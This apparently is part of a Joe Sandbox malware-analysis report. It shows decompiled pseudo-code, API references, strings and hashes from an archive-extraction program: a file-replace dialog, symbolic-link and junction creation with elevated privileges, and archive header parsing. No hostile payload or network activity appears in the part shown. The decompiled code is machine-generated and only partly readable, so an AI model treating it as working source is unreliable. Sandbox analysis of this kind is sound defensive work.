						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0x10620d4(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x0101b8e0
0x0101b8e0
0x0101b8e5
0x0101b8eb
0x0101b8f4
0x0101b8fe
0x0101b91d
0x0101b927
0x0101b92d
0x0101b9a7
0x0101b9c2
0x0101b9d1
0x0101b9e1
0x0101ba02
0x0101ba18
0x0101ba34
0x0101ba39
0x0101ba4c
0x0101ba5c
0x0101ba62
0x0101ba68
0x0101ba69
0x0101ba6e
0x0101ba71
0x0101ba78
0x0101ba94
0x0101ba9e
0x0101baa6
0x0101bac4
0x0101bac9
0x0101bad7
0x0101bade
0x0101baec
0x0101bb52
0x0101baee
0x0101bb08
0x0101bb0c
0x0101bb1b
0x0101bb23
0x0101bb37
0x0101bb3c
0x0101bb4a
0x0101bb4a
0x0101bb67
0x0101bb6d
0x0101bb78
0x0101bb87
0x0101bb97
0x0101bbb1
0x0101bbc9
0x0101bbd3
0x0101bbdb
0x0101bbf5
0x0101bbfa
0x0101bc08
0x0101bc16
0x0101bc1c
0x0101bc22
0x0101bc36
0x0101bc45
0x0101bc5c
0x0101bc61
0x0101bc6f
0x0101bc6f
0x0101bc22
0x0101bc75
0x0101bc75
0x0101bc77
0x0101bc81
0x0101bc81
0x0101b932
0x00000000
0x00000000
0x0101b93d
0x0101b93e
0x0101b940
0x0101b964
0x0101b964
0x0101b966
0x0101b966
0x0101b967
0x0101b971
0x0101b979
0x0101b97c
0x0101b97c
0x0101b984
0x00000000
0x0101b984
0x0101b942
0x0101b945
0x0101b999
0x00000000
0x0101b999
0x0101b947
0x0101b94a
0x0101b996
0x00000000
0x0101b996
0x0101b94c
0x0101b94f
0x0101b990
0x00000000
0x0101b990
0x0101b951
0x0101b954
0x00000000
0x00000000
0x0101b956
0x0101b959
0x0101b98c
0x00000000
0x0101b98c
0x0101b95e
0x00000000
0x00000000
0x00000000
0x0101b95e
0x0101b91f
0x0101b921
0x00000000

APIs

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101B971
EndDialog.USER32(?,00000006), ref: 0101B984
GetDlgItem.USER32(?,0000006C), ref: 0101B9A0
SetFocus.USER32(00000000), ref: 0101B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0101B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101BA18
FindFirstFileW.KERNEL32(?,?), ref: 0101BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101BA94
_swprintf.LIBCMT ref: 0101BAC4

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101BAD7
FindClose.KERNEL32(00000000), ref: 0101BADE
_swprintf.LIBCMT ref: 0101BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0101BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101BBC9
_swprintf.LIBCMT ref: 0101BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101BC08
_swprintf.LIBCMT ref: 0101BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0101BC6F

Part of subcall function 0101A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101A662
Part of subcall function 0101A63C: GetNumberFormatW.KERNEL32 ref: 0101A6B1

Strings

%s %s %s, xrefs: 0101BAB2, 0101BBE7
%s %s, xrefs: 0101BB29, 0101BC4E
REPLACEFILEDLG, xrefs: 0101B907

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 2c5c7ce373bc5b43b70c4ea11570b73360eac6bcd913bfbae4be088b88f2ca55
Instruction ID: 33e6a4997fcbf48d6b7bf2925f509759f65837ec179452526270a0eedc2c43c0
Opcode Fuzzy Hash: 2c5c7ce373bc5b43b70c4ea11570b73360eac6bcd913bfbae4be088b88f2ca55
Instruction Fuzzy Hash: 9E918272248349BBE6319AA4DD89FFB77ECEB49700F040819F7C9D6084DB7996058B62

Uniqueness

Uniqueness Score: -1.00%

Function 0100718C, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0100718C(void* __edx) {
				void* __esi;
				signed int _t108;
				void* _t110;
				intOrPtr _t113;
				int _t115;
				intOrPtr _t118;
				signed int _t136;
				int _t142;
				void* _t176;
				void* _t179;
				void* _t184;
				short _t185;
				intOrPtr _t191;
				void* _t196;
				void* _t197;
				void* _t216;
				void* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t222;
				WCHAR* _t223;
				intOrPtr _t227;
				short _t231;
				void* _t232;
				intOrPtr _t233;
				short _t235;
				void* _t236;
				void* _t238;
				void* _t239;

				_t217 = __edx;
				E0101E28C(E01031DC5, _t236);
				E0101E360();
				 *((intOrPtr*)(_t236 - 0x1c)) = 1;
				if( *0x1040eb3 == 0) {
					E01007BF5(L"SeRestorePrivilege");
					E01007BF5(L"SeCreateSymbolicLinkPrivilege");
					 *0x1040eb3 = 1;
				}
				_t193 = _t236 - 0x30;
				E0100709D(_t236 - 0x30, 0x1418);
				_t191 =  *((intOrPtr*)(_t236 + 0x10));
				 *(_t236 - 4) =  *(_t236 - 4) & 0x00000000;
				E0100FE56(_t236 - 0x1080, _t191 + 0x1104, 0x800);
				 *((intOrPtr*)(_t236 - 0x18)) = E010235B3(_t236 - 0x1080);
				_t226 = _t236 - 0x1080;
				_t222 = _t236 - 0x2080;
				_t108 = E01025808(_t236 - 0x1080, L"\\??\\", 4);
				_t239 = _t238 + 0x10;
				asm("sbb al, al");
				_t110 =  ~_t108 + 1;
				 *(_t236 - 0x10) = _t110;
				if(_t110 != 0) {
					_t226 = _t236 - 0x1078;
					_t184 = E01025808(_t236 - 0x1078, L"UNC\\", 4);
					_t239 = _t239 + 0xc;
					if(_t184 == 0) {
						_t185 = 0x5c;
						 *((short*)(_t236 - 0x2080)) = _t185;
						_t222 = _t236 - 0x207e;
						_t226 = _t236 - 0x1072;
					}
				}
				E010257E6(_t222, _t226);
				_t113 = E010235B3(_t236 - 0x2080);
				_t227 =  *((intOrPtr*)(_t236 + 8));
				_t223 =  *(_t236 + 0xc);
				 *((intOrPtr*)(_t236 - 0x14)) = _t113;
				if( *((char*)(_t227 + 0x6197)) != 0) {
					L9:
					_push(1);
					_push(_t223);
					E0100A04F(_t193, _t236);
					if( *((char*)(_t191 + 0x10f1)) != 0 ||  *((char*)(_t191 + 0x2104)) != 0) {
						_t115 = CreateDirectoryW(_t223, 0);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t176 = CreateFileW(_t223, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t176 == 0xffffffff) {
							L27:
							 *((char*)(_t236 - 0x1c)) = 0;
							L28:
							E010015A0(_t236 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t236 - 0xc));
							return  *((intOrPtr*)(_t236 - 0x1c));
						}
						CloseHandle(_t176);
						L14:
						_t118 =  *((intOrPtr*)(_t191 + 0x1100));
						if(_t118 != 3) {
							__eflags = _t118 - 2;
							if(_t118 == 2) {
								L18:
								_t196 =  *(_t236 - 0x30);
								_t218 =  *((intOrPtr*)(_t236 - 0x18));
								 *_t196 = 0xa000000c;
								_t231 = _t218 + _t218;
								 *((short*)(_t196 + 0xa)) = _t231;
								 *((short*)(_t196 + 4)) = 0x10 + ( *((intOrPtr*)(_t236 - 0x14)) + _t218) * 2;
								 *((intOrPtr*)(_t196 + 6)) = 0;
								E010257E6(_t196 + 0x14, _t236 - 0x1080);
								_t60 = _t231 + 2; // 0x3
								_t232 =  *(_t236 - 0x30);
								 *((short*)(_t232 + 0xc)) = _t60;
								 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
								E010257E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 0xb) * 2, _t236 - 0x2080);
								_t136 =  *(_t236 - 0x10) & 0x000000ff ^ 0x00000001;
								__eflags = _t136;
								 *(_t232 + 0x10) = _t136;
								L19:
								_t197 = CreateFileW(_t223, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t236 - 0x10) = _t197;
								if(_t197 == 0xffffffff) {
									goto L27;
								}
								_t142 = DeviceIoControl(_t197, 0x900a4, _t232, ( *(_t232 + 4) & 0x0000ffff) + 8, 0, 0, _t236 - 0x34, 0);
								_t256 = _t142;
								if(_t142 != 0) {
									E01009619(_t236 - 0x30a8);
									 *(_t236 - 4) = 1;
									E01007BD4(_t236 - 0x30a8,  *(_t236 - 0x10));
									_t233 =  *((intOrPtr*)(_t236 + 8));
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E01009D62(_t236 - 0x30a8, _t233,  ~( *(_t233 + 0x72d0)) & _t191 + 0x00001040,  ~( *(_t233 + 0x72d4)) & _t191 + 0x00001048,  ~( *(_t233 + 0x72d8)) & _t191 + 0x00001050);
									E010096D0(_t236 - 0x30a8);
									__eflags =  *((char*)(_t233 + 0x61a8));
									if( *((char*)(_t233 + 0x61a8)) == 0) {
										E0100A444(_t223,  *((intOrPtr*)(_t191 + 0x24)));
									}
									E01009653(_t236 - 0x30a8, _t233);
									goto L28;
								}
								CloseHandle( *(_t236 - 0x10));
								E01001F94(_t256, 0x15, 0, _t223);
								_t154 = GetLastError();
								if(_t154 == 5 || _t154 == 0x522) {
									if(E01010020() == 0) {
										E0100156B(_t236 - 0x80, 0x18);
										_t154 = E01010E37(_t236 - 0x80);
									}
								}
								E0101F190(_t154);
								E01006FC6(0x1040f50, 9);
								_push(_t223);
								if( *((char*)(_t191 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t118 - 1;
							if(_t118 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t216 =  *(_t236 - 0x30);
						_t220 =  *((intOrPtr*)(_t236 - 0x18));
						 *_t216 = 0xa0000003;
						_t235 = _t220 + _t220;
						 *((short*)(_t216 + 0xa)) = _t235;
						 *((short*)(_t216 + 4)) = 0xc + ( *((intOrPtr*)(_t236 - 0x14)) + _t220) * 2;
						 *((intOrPtr*)(_t216 + 6)) = 0;
						E010257E6(_t216 + 0x10, _t236 - 0x1080);
						_t40 = _t235 + 2; // 0x3
						_t232 =  *(_t236 - 0x30);
						 *((short*)(_t232 + 0xc)) = _t40;
						 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
						E010257E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 9) * 2, _t236 - 0x2080);
						goto L19;
					}
				}
				if( *(_t236 - 0x10) != 0) {
					goto L27;
				}
				_t179 = E0100B832(_t191 + 0x1104);
				_t249 = _t179;
				if(_t179 != 0) {
					goto L27;
				}
				_push(_t191 + 0x1104);
				_push(_t223);
				_push(_t191 + 0x28);
				_push(_t227);
				if(E010079B2(_t217, _t249) == 0) {
					goto L27;
				}
				goto L9;
			}

0x0100718c
0x01007191
0x0100719b
0x010071ad
0x010071b0
0x010071b7
0x010071c1
0x010071c6
0x010071c6
0x010071d1
0x010071d4
0x010071d9
0x010071dc
0x010071f3
0x01007206
0x01007209
0x01007211
0x0100721d
0x01007222
0x01007227
0x01007229
0x0100722b
0x01007230
0x01007234
0x01007242
0x01007247
0x0100724c
0x01007250
0x01007251
0x01007258
0x0100725e
0x0100725e
0x0100724c
0x01007266
0x01007272
0x01007277
0x0100727d
0x01007280
0x0100728a
0x010072c4
0x010072c7
0x010072c8
0x010072c9
0x010072d5
0x0100730c
0x01007312
0x01007314
0x00000000
0x00000000
0x00000000
0x010072e0
0x010072f1
0x010072fa
0x010074b9
0x010074b9
0x010074bd
0x010074c0
0x010074ce
0x010074d8
0x010074d8
0x01007301
0x0100731a
0x0100731a
0x01007323
0x0100738b
0x0100738e
0x01007398
0x01007398
0x0100739b
0x010073a3
0x010073a9
0x010073ac
0x010073b7
0x010073bd
0x010073cb
0x010073d0
0x010073d3
0x010073d6
0x010073df
0x010073f4
0x01007402
0x01007402
0x01007405
0x01007408
0x01007420
0x01007422
0x01007428
0x00000000
0x00000000
0x01007446
0x0100744c
0x0100744e
0x010074e9
0x010074f7
0x010074fb
0x01007500
0x01007511
0x01007524
0x01007537
0x01007542
0x0100754d
0x01007552
0x01007559
0x0100755f
0x0100755f
0x0100756a
0x00000000
0x0100756a
0x01007457
0x01007462
0x01007467
0x01007470
0x01007480
0x01007487
0x0100748f
0x0100748f
0x01007480
0x0100749b
0x010074a4
0x010074b0
0x010074b1
0x010074db
0x010074b3
0x010074b3
0x010074b3
0x00000000
0x010074b1
0x01007390
0x01007392
0x00000000
0x00000000
0x00000000
0x01007392
0x01007325
0x01007328
0x01007330
0x01007336
0x01007339
0x01007344
0x0100734a
0x01007358
0x0100735d
0x01007360
0x01007363
0x0100736c
0x01007381
0x00000000
0x01007386
0x010072d5
0x01007290
0x00000000
0x00000000
0x0100729d
0x010072a2
0x010072a4
0x00000000
0x00000000
0x010072b0
0x010072b1
0x010072b5
0x010072b6
0x010072be
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 01007191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 010072F1
CloseHandle.KERNEL32(00000000), ref: 01007301

Part of subcall function 01007BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007C04
Part of subcall function 01007BF5: GetLastError.KERNEL32 ref: 01007C4A
Part of subcall function 01007BF5: CloseHandle.KERNEL32(?), ref: 01007C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0100730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0100741A
DeviceIoControl.KERNEL32 ref: 01007446
CloseHandle.KERNEL32(?), ref: 01007457
GetLastError.KERNEL32 ref: 01007467
RemoveDirectoryW.KERNEL32(?), ref: 010074B3
DeleteFileW.KERNEL32(?), ref: 010074DB

Strings

UNC\, xrefs: 0100723C
SeCreateSymbolicLinkPrivilege, xrefs: 010071BC
SeRestorePrivilege, xrefs: 010071B2
\??\, xrefs: 01007217

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 7c8ab347427e86a8e7f46b5ffd61b2d71666cbb81ce558af0a8247ea945a8c72
Instruction ID: d16762381cd71f0f7f03aff437a26aeff373fabaed3bd9330b0bd010ce523630
Opcode Fuzzy Hash: 7c8ab347427e86a8e7f46b5ffd61b2d71666cbb81ce558af0a8247ea945a8c72
Instruction Fuzzy Hash: 1AB1B671900215ABEF22DB64DC85BEEB7B8BF04304F044599FAC9E7181DB78AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01003281, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E01003281(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t393;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int _t410;
				signed int _t420;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				intOrPtr _t501;
				signed int _t502;
				signed char _t503;
				unsigned int _t504;
				void* _t511;
				void* _t519;
				signed int _t522;
				void* _t523;
				signed int _t533;
				unsigned int _t536;
				void* _t541;
				intOrPtr _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				intOrPtr _t559;

				_t397 = __ecx;
				_t549 = _t548 - 0x68;
				E0101E28C(E01031D01, _t547);
				E0101E360();
				_t395 = _t397;
				E0100C565(_t547 + 0x30, _t395);
				 *(_t547 + 0x60) = 0;
				 *((intOrPtr*)(_t547 - 4)) = 0;
				if( *((intOrPtr*)(_t395 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t547 + 0x6a)) = 0;
					L16:
					_push(7);
					if(E0100C770() >= 7) {
						 *(_t395 + 0x21f4) = 0;
						_t511 = _t395 + 0x21e4;
						 *_t511 = E0100C5E0(_t547 + 0x30);
						_t533 = E0100C74C(_t547 + 0x30, 4);
						_t242 = E0100C6E0(_t500);
						__eflags = _t242 | _t500;
						if((_t242 | _t500) == 0) {
							L85:
							E0100204E(_t395);
							L86:
							E010015A0(_t547 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t547 - 0xc));
							return  *(_t547 + 0x60);
						}
						__eflags = _t533;
						if(_t533 == 0) {
							goto L85;
						}
						_t42 = _t533 - 3; // -3
						_t536 = _t533 + 4 + _t242;
						_t410 = _t42 + _t242;
						__eflags = _t410;
						 *(_t547 + 0x64) = _t536;
						if(_t410 < 0) {
							goto L85;
						}
						__eflags = _t536 - 7;
						if(_t536 < 7) {
							goto L85;
						}
						_push(_t410);
						E0100C770();
						__eflags =  *(_t547 + 0x48) - _t536;
						if( *(_t547 + 0x48) < _t536) {
							goto L17;
						}
						_t248 = E0100C6C0(_t547 + 0x30);
						 *(_t395 + 0x21e8) = E0100C6E0(_t500);
						_t250 = E0100C6E0(_t500);
						 *(_t395 + 0x21ec) = _t250;
						__eflags =  *_t511 - _t248;
						 *(_t395 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t395 + 0x21f0) =  *(_t547 + 0x64);
						_t254 =  *(_t395 + 0x21e8);
						 *(_t395 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t511 != _t248;
						 *(_t547 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t395 + 0x21ec) & 0x00000001;
							 *(_t547 + 0x58) = 0;
							 *(_t547 + 0x54) = 0;
							if(( *(_t395 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t395 + 0x21ec) & 0x00000002;
								_t538 = _t256;
								 *(_t547 + 0x64) = _t256;
								 *(_t547 + 0x5c) = _t256;
								if(( *(_t395 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E0100C6E0(_t500);
									_t538 = _t362;
									 *(_t547 + 0x64) = _t362;
									 *(_t547 + 0x5c) = _t500;
								}
								_t257 = E01001924(_t395,  *(_t395 + 0x21f0));
								_t501 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t395 + 0x6ca8)) = E01003E70( *((intOrPtr*)(_t395 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t395 + 0x6ca4)), _t538,  *(_t547 + 0x5c), _t501, _t501);
								 *((intOrPtr*)(_t395 + 0x6cac)) = _t501;
								_t502 =  *(_t395 + 0x21e8);
								__eflags = _t502 - 1;
								if(__eflags == 0) {
									E0100ACCC(_t395 + 0x2208);
									_t420 = 5;
									memcpy(_t395 + 0x2208, _t511, _t420 << 2);
									_t503 = E0100C6E0(_t502);
									 *(_t395 + 0x6cb5) = _t503 & 1;
									 *(_t395 + 0x6cb4) = _t503 >> 0x00000002 & 1;
									 *(_t395 + 0x6cb7) = _t503 >> 0x00000004 & 1;
									_t432 = 1;
									 *((char*)(_t395 + 0x6cba)) = 1;
									 *(_t395 + 0x6cbb) = _t503 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t395 + 0x6cb8)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = E0100C6E0(_t503);
										_t270 = 0;
										_t432 = 1;
									}
									__eflags =  *(_t395 + 0x6cb5);
									if( *(_t395 + 0x6cb5) == 0) {
										L81:
										_t432 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t395 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t395 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t395 + 0x6cb9)) = _t432;
											_t433 =  *(_t547 + 0x58);
											__eflags = _t433 |  *(_t547 + 0x54);
											if((_t433 |  *(_t547 + 0x54)) != 0) {
												E01002162(_t395, _t547 + 0x30, _t433, _t395 + 0x2208);
											}
											L84:
											 *(_t547 + 0x60) =  *(_t547 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t502 - 3;
								if(_t502 <= 3) {
									__eflags = _t502 - 2;
									_t120 = (0 | _t502 != 0x00000002) - 1; // -1
									_t519 = (_t120 & 0xffffdcb0) + 0x45d0 + _t395;
									 *(_t547 + 0x2c) = _t519;
									E0100AC32(_t519, 0);
									_t438 = 5;
									memcpy(_t519, _t395 + 0x21e4, _t438 << 2);
									_t541 =  *(_t547 + 0x2c);
									 *(_t547 + 0x60) =  *(_t395 + 0x21e8);
									 *(_t541 + 0x1058) =  *(_t547 + 0x64);
									 *((char*)(_t541 + 0x10f9)) = 1;
									 *(_t541 + 0x105c) =  *(_t547 + 0x5c);
									 *(_t541 + 0x1094) = E0100C6E0(_t502);
									 *(_t541 + 0x1060) = E0100C6E0(_t502);
									_t289 =  *(_t541 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t541 + 0x1064) = _t502;
									 *(_t541 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t541 + 0x1060) = 0x7fffffff;
										 *(_t541 + 0x1064) = 0x7fffffff;
									}
									_t442 =  *(_t541 + 0x105c);
									_t522 =  *(_t541 + 0x1064);
									_t290 =  *(_t541 + 0x1058);
									_t504 =  *(_t541 + 0x1060);
									__eflags = _t442 - _t522;
									if(__eflags < 0) {
										L51:
										_t290 = _t504;
										_t442 = _t522;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t541 + 0x106c) = _t442;
											 *(_t541 + 0x1068) = _t290;
											_t291 = E0100C6E0(_t504);
											__eflags =  *(_t541 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t541 + 0x24)) = _t291;
											if(( *(_t541 + 0x1094) & 0x00000002) != 0) {
												E01010DBD(_t541 + 0x1040, _t504, E0100C5E0(_t547 + 0x30), 0);
											}
											 *(_t541 + 0x1070) =  *(_t541 + 0x1070) & 0x00000000;
											__eflags =  *(_t541 + 0x1094) & 0x00000004;
											if(( *(_t541 + 0x1094) & 0x00000004) != 0) {
												 *(_t541 + 0x1070) = 2;
												 *((intOrPtr*)(_t541 + 0x1074)) = E0100C5E0(_t547 + 0x30);
											}
											 *(_t541 + 0x1100) =  *(_t541 + 0x1100) & 0x00000000;
											_t292 = E0100C6E0(_t504);
											 *(_t547 + 0x64) = _t292;
											 *(_t541 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t450 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t541 + 0x1c)) = _t450;
											__eflags = _t450 - 0x32;
											if(_t450 != 0x32) {
												 *((intOrPtr*)(_t541 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t541 + 0x18)) = E0100C6E0(_t504);
											_t523 = E0100C6E0(_t504);
											 *(_t541 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t541 + 0x18));
											 *(_t541 + 0x10f8) =  *(_t395 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t541 + 0x10fc;
													 *_t177 =  *(_t541 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t541 + 0x10fc) = 1;
											}
											_t456 =  *(_t541 + 8);
											 *(_t541 + 0x1098) = _t456 >> 0x00000003 & 1;
											 *(_t541 + 0x10fa) = _t456 >> 0x00000005 & 1;
											__eflags =  *(_t547 + 0x60) - 2;
											_t459 =  *(_t547 + 0x64);
											 *(_t541 + 0x1099) = _t456 >> 0x00000004 & 1;
											if( *(_t547 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t459 & 0x00000040;
												if((_t459 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t541 + 0x10f0)) = _t302;
												_t304 =  *(_t541 + 0x1094) & 1;
												 *(_t541 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t541 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t541 + 0x109c) =  ~( *(_t541 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t523 - 0x1fff;
												if(_t523 >= 0x1fff) {
													_t523 = 0x1fff;
												}
												E0100C642(_t547 + 0x30, _t547 - 0x2074, _t523);
												 *((char*)(_t547 + _t523 - 0x2074)) = 0;
												_push(0x800);
												_t524 = _t541 + 0x28;
												_push(_t541 + 0x28);
												_push(_t547 - 0x2074);
												E01011430();
												_t463 =  *(_t547 + 0x58);
												__eflags = _t463 |  *(_t547 + 0x54);
												if((_t463 |  *(_t547 + 0x54)) != 0) {
													E01002162(_t395, _t547 + 0x30, _t463, _t541);
												}
												_t319 =  *(_t547 + 0x60);
												__eflags =  *(_t547 + 0x60) - 2;
												if( *(_t547 + 0x60) != 2) {
													L72:
													_t320 = E010235E9(_t319, _t524, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t395 + 0x6cb6)) = 1;
													}
